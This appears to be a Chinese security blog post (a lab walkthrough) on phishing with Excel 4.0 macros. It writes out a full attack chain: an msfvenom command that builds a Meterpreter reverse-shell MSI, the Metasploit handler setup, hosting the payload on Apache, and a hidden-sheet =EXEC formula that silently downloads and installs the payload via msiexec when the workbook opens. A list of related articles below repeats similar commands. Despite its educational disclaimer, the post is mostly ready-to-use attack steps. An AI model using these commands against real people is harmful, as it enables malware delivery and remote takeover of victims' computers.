Excel宏钓鱼

最新推荐文章于 2025-05-08 22:30:16 发布
原创 最新推荐文章于 2025-05-08 22:30:16 发布 · 494 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#excel #网络安全 #安全 #web安全 #网络攻击模型

Excel宏钓鱼

技术概述

Excel宏钓鱼是一种利用Office宏功能执行恶意代码的攻击手段。攻击者通过诱导用户启用宏(通常伪装成重要文档),触发恶意VBA代码从远程服务器下载并执行载荷。本实验演示了使用MSI静默安装包配合Meterpreter反向连接的完整攻击链,具有以下技术特征:

  1. 利用Excel 4.0宏表(XLM)实现代码执行,相比传统VBA宏更隐蔽
  2. 使用msiexec静默安装技术实现无感载荷部署
  3. 通过HTTP服务器分发恶意载荷,规避传统文件传输检测
  4. 建立Meterpreter反向TCP连接获取控制权限

:本实验仅用于教育目的,实际实施可能违反相关法律法规

实验环境:

  • Windows 10 (192.168.88.129)
  • Kali 2018 (192.168.88.128)
  • Excel 2016

实验步骤

攻击端配置(Kali)

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.88.128 lport=4444 -f msi -o hack.msi # 生成Windows载荷(MSI格式)

在这里插入图片描述

在这里插入图片描述

# 启动Metasploit监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.88.128
exploit

在这里插入图片描述

# 启动Apache服务托管恶意文件
apache2 -k start
systemctl start apache2

在这里插入图片描述

目标端操作(Windows)

打开Excel,创建宏表

在这里插入图片描述

输入Excel 4.0宏表特殊函数
=EXEC("msiexec /q /i http://192.168.88.128/hack.msi")
=HALT() # 终止宏执行防止异常提示
# 静默安装参数:/q - 无界面模式 /i - 安装指令

在这里插入图片描述

在这里插入图片描述

最后隐藏该宏表并以“启用宏的工作簿”保存

在这里插入图片描述

再次打开该工作簿,可以看到目标主机已上线,钓鱼成功!

在这里插入图片描述

攻击流程图

在这里插入图片描述

补充说明

该攻击方式的成功率主要依赖:

  1. 目标系统未安装MSI安装器补丁(KB971187)
  2. Excel安全设置未禁用XLM宏
  3. 防火墙未阻止反向TCP连接
  4. 用户手动允许宏执行(社会工程)
浅谈钓鱼攻防之道-制作免杀excel文件钓鱼
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
10-25 1328
如果我告诉你我很厉害,也许你会说我在吹牛。但是如果我告诉你我并不厉害,你肯定知道我在撒谎。
php 调用 excel _原创干货 | excel钓鱼简介
weixin_39663729的博客
12-06 706
点击关注了解更多精彩内容!!excel钓鱼简介关于excel钓鱼是由来已久的一种攻击方式,目前本人已知的方法有:office攻击DDE攻击power query DDE(DDE的一种)office攻击攻击,一种古老的攻击手法,依靠在office中插入恶意的vbs代码,来执行恶意shellcode。在cs中就有现成的攻击。然后按照步骤加入,用户在启用的情况下即可顺利上线。DDE...
Excel的IYQ钓鱼
dda6607的博客
05-20 2404
Excel的IYQ钓鱼 0x00 环境准备 操作系统:windows7 microsoft office版本:office 2010 0x01 了解IYQ的基本概念 可以将IYQ简单的理解成内置在excel中的一种特殊‘web浏览器’(不能加载脚本),通过IQY【即web查询】语句,可以直接将各类web上的列表数据轻松引入到当前的excel中,而正是因为这样,从而给了我们利用e...
Excel-Phish:网络钓鱼密码保护的Excel文件
04-24
Excel钓鱼 网络钓鱼密码保护的Excel文件-由和。 相应的博客文章可以在这里找到:
Office病毒钓鱼-打点突破
最新发布
Blanks的博客
05-08 795
打点突破之社工钓鱼篇:Office病毒,利用Office的Word文档攻击控制机器
常见的钓鱼招式,可千万别入坑哦
HBohan的博客
10-19 507
OFFICE 【查看资料】 Office安全保护机制 受保护的视图 为了保护计算机不受office病毒侵害,微软设计了一个收保护视图,将所有可疑的office文件以只读方式打开,在该模式下多数编辑功能被禁用。文件呗以受保护视图打开的情况有如下几种 文件是从 Internet 位置打开的 文件是通过 Outlook 附件的方式接收的,并且计算机策略将发件人定义为不安全 文件是从不安全的位置打开的 文件被文件块阻止 文件验证失败 文件是使用“在受保护的视图中打开”选项打开的 文件是从其他人的 OneDr.
EXCEL病毒解决方案:Office病毒专杀工具
Office病毒,尤其是EXCEL病毒和WORD病毒,是一种能够附着在Office文档中的恶意代码,它们利用Office软件中的编程功能进行复制和传播。这种病毒可以执行各种恶意操作,如窃取个人信息、破坏文件、甚至控制用户...
EXCELntDonut: 利用Excel 4.0注入DLL和EXE的高级技术
标签中的"phishing macro"指向了钓鱼攻击中的一个具体策略,即通过发送含有恶意Excel的电子邮件附件来诱骗用户执行。一旦用户执行了,攻击者就有机会在用户的计算机上执行恶意代码,例如注入DLL或EXE。 ...
红队简单钓鱼实战---office
LvHLong的博客
05-30 1711
前言 本文发布已获得本人授权 ,本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 一、office介绍 是微软公司为其OFFICE软件包设计的一个特殊功能,软件设计者为了让人们在使用软件进行工作时,避免一再地重复相同的动作而设计出来的一种工具,它利用简单的语法,把常用的动作写成,当在工作时,就可以直接利用事先编好的自动运行,去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。 病毒是一种常见的计算机病毒,......
社会工程学之钓鱼attack常见手段和方法
weixin_51339377的博客
03-27 1516
1.excel钓鱼 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.186 lport=4444 -f msi -o hack.msi msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost=192.168.1.186 show options exploit 将msi粘贴到/var/www/htm..
社工 钓鱼样本制作
2301_79621164的博客
08-26 1033
靶机:32位windows7攻击机:kali
钓鱼的常见几种方式
qq_55894976的博客
08-20 1362
【代码】钓鱼的常见几种方式。
钓鱼】基于office的一些钓鱼技法
uuzeray的博客
01-26 738
解压docx文件,修改 word\_rels\settings.xml.rels文件的Target属性,将其指向部署恶意模版文件的服务器。先随便创建一个快捷方式,让其指向powershell,并用-command指定恶意命令。去下一个pdf风格的png文件,改后缀为ico文件。3.新建并保存一个使用任意模版的docx文件。1.制作包含的恶意模版文件(.dotm)下面用office2016来演示。2.将恶意模版文件上传至服务器。打开docx文件,成功执行命令。保存后打开文件,成功命令执行。
社会工程学钓鱼样本的制作
m0_72482018的博客
12-09 309
msfvenom -p windows/x64/meterpreter/reverse_tcp lhsot=kali的ip lport=监听的端口 -f msi -o diaoyexl.msi。msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的ip LPORT=监听端口 -f exe -o flash.exe。这里解压前运行的是恶意远控木马,解压后运行的是正常的flash程序。然后python在具有恶意的msi的文件夹下开启http服务。
全面掌握EXCEL病毒防护与清除
weixin_32047493的博客
09-28 5590
本文还有配套的精品资源,点击获取 简介:本文介绍了EXCEL病毒的传播原理、危害、预防措施,以及专杀工具的使用方法。病毒利用VBA编程隐藏在Excel文件中,通过自动执行来感染系统。用户需更新安全设置、谨慎处理邮件附件、使用杀毒软件和定期备份文件来预防。专杀工具能扫描、清除感染、提供实时防护,并教育用户如何应对病毒威胁。 1. EXCEL病毒概述 ...
分享一个进阶版的钓鱼
acker930616263的博客
07-09 6761
run C_VoiceChat.SpeakText(0, "钓鱼模式,已装配鱼竿", Enum.VoiceTtsDestination.LocalPlayback, 0, 100)/run C_VoiceChat.SpeakText(0, "默认模式,已装配武器", Enum.VoiceTtsDestination.LocalPlayback, 0, 100)/equip 这个是武器切换,/equip 精致的卡鲁亚克鱼竿 这个是你的鱼竿,其他都可不用动,还有语音提示哦。/equip 无尽寒冬。
office简单钓鱼与cve2017-11882
cxk
06-28 586
office简单钓鱼与cve2017-11882 cve2017-11882 靶机 windows07 攻击机 kali 1)先下载msf payload与py生成的word msf payload https://github.com/0x09AL/CVE-2017-11882-metasploit 路径 cve_2017_11882.rb 放在usr/share/metasploit-fra...
渗透测试-地基钓鱼篇-Word文档注入执行恶意(二十四)
qq_34801745的博客
12-17 4438
** 渗透测试-地基钓鱼篇-Word文档注入执行恶意(二十四) ** 作者:大余 时间:2020-12-16 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言: 你对这行的兴趣,决定
使用Cobalt Strike来钓鱼(MS Office Macro)
浅笑996的博客
11-16 3247
Cobalt Strike操作 点击Cobalt Strike主界面中attacks->packages->ms office macro 弹出界面选择Listener,单机确定 对话框中给出每一步仔细操作,单机copy macro按钮 word操作 点击上方标签视图标签 在该标签中点击按钮,弹出的对话框中输入名字,然后单机创建按钮 首先清空所有代码,然后将复制的代码粘贴...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值